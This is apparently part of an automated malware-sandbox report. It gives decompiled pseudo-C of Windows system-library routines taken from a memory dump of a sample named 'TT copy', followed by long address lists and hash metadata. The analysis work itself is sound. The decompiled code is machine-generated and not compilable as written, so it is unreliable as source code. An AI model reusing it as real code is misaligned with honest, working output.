				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1158714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E01092EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E01092EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E010658EC(_t240);
									_t221 =  *0x1155cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1155cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E010A4A2C(0x1156e40, 0x10a4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E01087D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1045c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0109F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0109F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E010E7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L01082400(_t267 + 0x20);
															}
															L01082400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01092397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E01082280(_t134, 0x1158608);
									__eflags =  *0x1156e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0107FFB0(_t198, _t241, 0x1158608);
										__eflags = _t253;
										if(_t253 != 0) {
											L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1156e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1158608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01096B90(_t210,  &_v64);
										_t262 =  *0x1158608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0109E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E010A97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E010A006A(0x1158608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1158608);
												E010AB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1156904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1156e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0107FFB0(_t198, _t240, 0x1158608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E010A00C2(0x1158608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                            0x010920a0
                                                                                                            0x010920a8
                                                                                                            0x010920ad
                                                                                                            0x010920b3
                                                                                                            0x010920b8
                                                                                                            0x010920c2
                                                                                                            0x010920c7
                                                                                                            0x010920cb
                                                                                                            0x010920d2
                                                                                                            0x01092263
                                                                                                            0x01092266
                                                                                                            0x010d5836
                                                                                                            0x010d5836
                                                                                                            0x00000000
                                                                                                            0x0109226c
                                                                                                            0x0109226c
                                                                                                            0x01092270
                                                                                                            0x01092274
                                                                                                            0x010920e2
                                                                                                            0x010920e2
                                                                                                            0x010920e6
                                                                                                            0x010920ee
                                                                                                            0x010d57dc
                                                                                                            0x010d57de
                                                                                                            0x010d57ec
                                                                                                            0x010d57ec
                                                                                                            0x010d57f1
                                                                                                            0x010d57f3
                                                                                                            0x010d57f8
                                                                                                            0x00000000
                                                                                                            0x010d57f8
                                                                                                            0x010d57e0
                                                                                                            0x010d57e4
                                                                                                            0x010d57ea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d57ea
                                                                                                            0x010920f4
                                                                                                            0x010920f4
                                                                                                            0x010920f8
                                                                                                            0x010920f8
                                                                                                            0x010920fc
                                                                                                            0x01092100
                                                                                                            0x01092106
                                                                                                            0x01092201
                                                                                                            0x01092206
                                                                                                            0x0109220b
                                                                                                            0x0109220e
                                                                                                            0x010922a9
                                                                                                            0x010922ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010922b2
                                                                                                            0x010922b5
                                                                                                            0x010d5801
                                                                                                            0x010d5806
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5810
                                                                                                            0x010d5815
                                                                                                            0x010d5818
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d581e
                                                                                                            0x010922bb
                                                                                                            0x010922bb
                                                                                                            0x01092218
                                                                                                            0x01092218
                                                                                                            0x0109221c
                                                                                                            0x01092220
                                                                                                            0x01092222
                                                                                                            0x010922c2
                                                                                                            0x010922c4
                                                                                                            0x010922dc
                                                                                                            0x010922dc
                                                                                                            0x010922e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010922e7
                                                                                                            0x010922c8
                                                                                                            0x010922cd
                                                                                                            0x010922d3
                                                                                                            0x010922d6
                                                                                                            0x010d5823
                                                                                                            0x010d5825
                                                                                                            0x010d5827
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d582d
                                                                                                            0x00000000
                                                                                                            0x010d582d
                                                                                                            0x00000000
                                                                                                            0x01092228
                                                                                                            0x01092228
                                                                                                            0x00000000
                                                                                                            0x01092228
                                                                                                            0x01092222
                                                                                                            0x01092214
                                                                                                            0x01092214
                                                                                                            0x00000000
                                                                                                            0x01092114
                                                                                                            0x01092114
                                                                                                            0x01092114
                                                                                                            0x0109211a
                                                                                                            0x0109211c
                                                                                                            0x01092348
                                                                                                            0x0109234d
                                                                                                            0x010d5840
                                                                                                            0x010d5845
                                                                                                            0x010d5848
                                                                                                            0x010d584e
                                                                                                            0x010d584e
                                                                                                            0x010d5848
                                                                                                            0x01092353
                                                                                                            0x01092355
                                                                                                            0x01092388
                                                                                                            0x01092388
                                                                                                            0x01092368
                                                                                                            0x0109236a
                                                                                                            0x0109236c
                                                                                                            0x0109238f
                                                                                                            0x00000000
                                                                                                            0x0109236e
                                                                                                            0x0109236e
                                                                                                            0x0109218e
                                                                                                            0x0109218e
                                                                                                            0x01092191
                                                                                                            0x01092195
                                                                                                            0x010d5a03
                                                                                                            0x010d5a06
                                                                                                            0x010d5a0c
                                                                                                            0x010d5a0f
                                                                                                            0x010d5a11
                                                                                                            0x010d5a13
                                                                                                            0x010d5a13
                                                                                                            0x010d5a19
                                                                                                            0x010d5a1f
                                                                                                            0x00000000
                                                                                                            0x0109219b
                                                                                                            0x0109219b
                                                                                                            0x010921a0
                                                                                                            0x01092282
                                                                                                            0x01092284
                                                                                                            0x01092284
                                                                                                            0x01092284
                                                                                                            0x01092284
                                                                                                            0x010921a6
                                                                                                            0x010921a9
                                                                                                            0x010921ac
                                                                                                            0x010921ae
                                                                                                            0x010921b3
                                                                                                            0x0109228b
                                                                                                            0x01092290
                                                                                                            0x01092379
                                                                                                            0x01092296
                                                                                                            0x01092298
                                                                                                            0x01092298
                                                                                                            0x01092290
                                                                                                            0x010921b9
                                                                                                            0x010921be
                                                                                                            0x010922a2
                                                                                                            0x010922a2
                                                                                                            0x010921c4
                                                                                                            0x010921c8
                                                                                                            0x010921cc
                                                                                                            0x010921d0
                                                                                                            0x010921d4
                                                                                                            0x010921de
                                                                                                            0x010921e3
                                                                                                            0x010d5a29
                                                                                                            0x010d5a2c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5a3b
                                                                                                            0x00000000
                                                                                                            0x010921e9
                                                                                                            0x010921e9
                                                                                                            0x010921e9
                                                                                                            0x010921ee
                                                                                                            0x010921f1
                                                                                                            0x010d5a45
                                                                                                            0x010d5a4b
                                                                                                            0x010d5a52
                                                                                                            0x010d5a58
                                                                                                            0x010d5a5d
                                                                                                            0x010d5a5f
                                                                                                            0x010d5a71
                                                                                                            0x010d5a61
                                                                                                            0x010d5a6a
                                                                                                            0x010d5a6a
                                                                                                            0x010d5a76
                                                                                                            0x010d5a79
                                                                                                            0x010d5a7f
                                                                                                            0x010d5a83
                                                                                                            0x010d5a85
                                                                                                            0x010d5a87
                                                                                                            0x010d5a87
                                                                                                            0x010d5a8c
                                                                                                            0x010d5a91
                                                                                                            0x010d5a97
                                                                                                            0x010d5a9f
                                                                                                            0x010d5aa0
                                                                                                            0x010d5aa1
                                                                                                            0x010d5aa6
                                                                                                            0x010d5aab
                                                                                                            0x010d5ab1
                                                                                                            0x010d5ab3
                                                                                                            0x010d5ab9
                                                                                                            0x010d5aca
                                                                                                            0x010d5ad4
                                                                                                            0x010d5ad4
                                                                                                            0x010d5ade
                                                                                                            0x010d5ade
                                                                                                            0x010d5aab
                                                                                                            0x010d5a79
                                                                                                            0x010d5a52
                                                                                                            0x010921f7
                                                                                                            0x010921f9
                                                                                                            0x010921fe
                                                                                                            0x010921fe
                                                                                                            0x010921e3
                                                                                                            0x01092195
                                                                                                            0x0109236c
                                                                                                            0x01092122
                                                                                                            0x01092122
                                                                                                            0x01092124
                                                                                                            0x01092231
                                                                                                            0x01092236
                                                                                                            0x01092236
                                                                                                            0x01092238
                                                                                                            0x01092238
                                                                                                            0x01092240
                                                                                                            0x01092242
                                                                                                            0x01092244
                                                                                                            0x010d59fc
                                                                                                            0x0109218c
                                                                                                            0x0109218c
                                                                                                            0x00000000
                                                                                                            0x0109218c
                                                                                                            0x0109224a
                                                                                                            0x0109224f
                                                                                                            0x01092256
                                                                                                            0x01092304
                                                                                                            0x01092309
                                                                                                            0x0109230f
                                                                                                            0x0109231e
                                                                                                            0x0109231e
                                                                                                            0x0109231e
                                                                                                            0x01092320
                                                                                                            0x01092325
                                                                                                            0x0109232a
                                                                                                            0x0109232c
                                                                                                            0x0109233e
                                                                                                            0x0109233e
                                                                                                            0x00000000
                                                                                                            0x0109232c
                                                                                                            0x01092311
                                                                                                            0x01092317
                                                                                                            0x0109231a
                                                                                                            0x0109231c
                                                                                                            0x01092380
                                                                                                            0x01092380
                                                                                                            0x01092380
                                                                                                            0x01092384
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01092386
                                                                                                            0x00000000
                                                                                                            0x0109231c
                                                                                                            0x0109225c
                                                                                                            0x0109225c
                                                                                                            0x00000000
                                                                                                            0x0109225c
                                                                                                            0x0109212a
                                                                                                            0x01092134
                                                                                                            0x01092138
                                                                                                            0x0109213d
                                                                                                            0x010d5858
                                                                                                            0x010d5863
                                                                                                            0x010d5863
                                                                                                            0x010d5867
                                                                                                            0x010d586a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d586c
                                                                                                            0x010d586c
                                                                                                            0x010d5871
                                                                                                            0x010d5875
                                                                                                            0x010d5877
                                                                                                            0x010d5997
                                                                                                            0x010d599c
                                                                                                            0x010d59a1
                                                                                                            0x010d59a7
                                                                                                            0x010d59a7
                                                                                                            0x00000000
                                                                                                            0x010d59a7
                                                                                                            0x010d587d
                                                                                                            0x00000000
                                                                                                            0x010d588b
                                                                                                            0x010d588b
                                                                                                            0x010d5890
                                                                                                            0x010d5892
                                                                                                            0x010d5894
                                                                                                            0x010d5899
                                                                                                            0x010d589b
                                                                                                            0x010d58a0
                                                                                                            0x010d58a0
                                                                                                            0x010d58aa
                                                                                                            0x010d58b2
                                                                                                            0x010d58b6
                                                                                                            0x010d58be
                                                                                                            0x010d58c6
                                                                                                            0x010d58c9
                                                                                                            0x010d590d
                                                                                                            0x010d5917
                                                                                                            0x010d591a
                                                                                                            0x010d591c
                                                                                                            0x010d5920
                                                                                                            0x010d5928
                                                                                                            0x010d592a
                                                                                                            0x010d592c
                                                                                                            0x010d592e
                                                                                                            0x010d592e
                                                                                                            0x010d58cb
                                                                                                            0x010d58cd
                                                                                                            0x010d58d8
                                                                                                            0x010d58e0
                                                                                                            0x010d58f4
                                                                                                            0x010d58fe
                                                                                                            0x010d58fe
                                                                                                            0x010d593a
                                                                                                            0x010d593e
                                                                                                            0x010d5940
                                                                                                            0x010d5942
                                                                                                            0x00000000
                                                                                                            0x010d5944
                                                                                                            0x010d5944
                                                                                                            0x010d5949
                                                                                                            0x010d594e
                                                                                                            0x010d594e
                                                                                                            0x010d5953
                                                                                                            0x010d595b
                                                                                                            0x010d5976
                                                                                                            0x010d5976
                                                                                                            0x010d597a
                                                                                                            0x010d597f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5981
                                                                                                            0x010d5981
                                                                                                            0x010d5981
                                                                                                            0x010d5983
                                                                                                            0x010d5988
                                                                                                            0x010d598d
                                                                                                            0x010d5991
                                                                                                            0x010d5991
                                                                                                            0x00000000
                                                                                                            0x010d595d
                                                                                                            0x010d595d
                                                                                                            0x010d5963
                                                                                                            0x010d5965
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5967
                                                                                                            0x010d5967
                                                                                                            0x010d596b
                                                                                                            0x010d596d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d596f
                                                                                                            0x010d5971
                                                                                                            0x010d5971
                                                                                                            0x010d5974
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d5974
                                                                                                            0x00000000
                                                                                                            0x010d5967
                                                                                                            0x010d595b
                                                                                                            0x010d5942
                                                                                                            0x010d5863
                                                                                                            0x01092143
                                                                                                            0x01092143
                                                                                                            0x01092149
                                                                                                            0x0109214f
                                                                                                            0x010922f1
                                                                                                            0x010922f6
                                                                                                            0x00000000
                                                                                                            0x01092173
                                                                                                            0x01092173
                                                                                                            0x0109217d
                                                                                                            0x01092181
                                                                                                            0x01092186
                                                                                                            0x010d59ae
                                                                                                            0x010d59b2
                                                                                                            0x010d59b5
                                                                                                            0x010d59b7
                                                                                                            0x010d59ba
                                                                                                            0x010d59cd
                                                                                                            0x010d59d1
                                                                                                            0x010d59d5
                                                                                                            0x010d59d9
                                                                                                            0x010d59db
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d59dd
                                                                                                            0x010d59dd
                                                                                                            0x010d59e1
                                                                                                            0x010d59e4
                                                                                                            0x010d59e7
                                                                                                            0x010d59ee
                                                                                                            0x010d59ee
                                                                                                            0x010d59f3
                                                                                                            0x010d59f3
                                                                                                            0x00000000
                                                                                                            0x01092186
                                                                                                            0x0109214f
                                                                                                            0x01092106
                                                                                                            0x01092266
                                                                                                            0x010920d8
                                                                                                            0x010920da
                                                                                                            0x010920e0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4de8aea71003165ee4b16998d98a450ef178d2bbd55de3b97245c1f7e9e66cdf
                                                                                                            • Instruction ID: 5183acb70d3448e256f2af1495b4c8e8628b58ea57058ce0ce151c3ad3e9393b
                                                                                                            • Opcode Fuzzy Hash: 4de8aea71003165ee4b16998d98a450ef178d2bbd55de3b97245c1f7e9e66cdf
                                                                                                            • Instruction Fuzzy Hash: 34F11371608301EFEB66CF2CC85076ABBF1AF95324F0485ADE9E59B281D734D841DB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0107D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E0107D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x115d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01076600(0x11552d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1157b9c; // 0x0
							_t281 = L01084620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E010AF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1157b90; // 0x77380000
								if(_t384 == 0) {
									_t353 =  *0x1157b8c; // 0xc02a20
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01082280(_t200, 0x11584d8);
									_t277 =  *0x11585f4; // 0xc02f10
									_t351 =  *0x11585f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xc02ea8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0107FFB0(_t287, _t353, 0x11584d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E010BCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01076600(0x11552d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01077926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
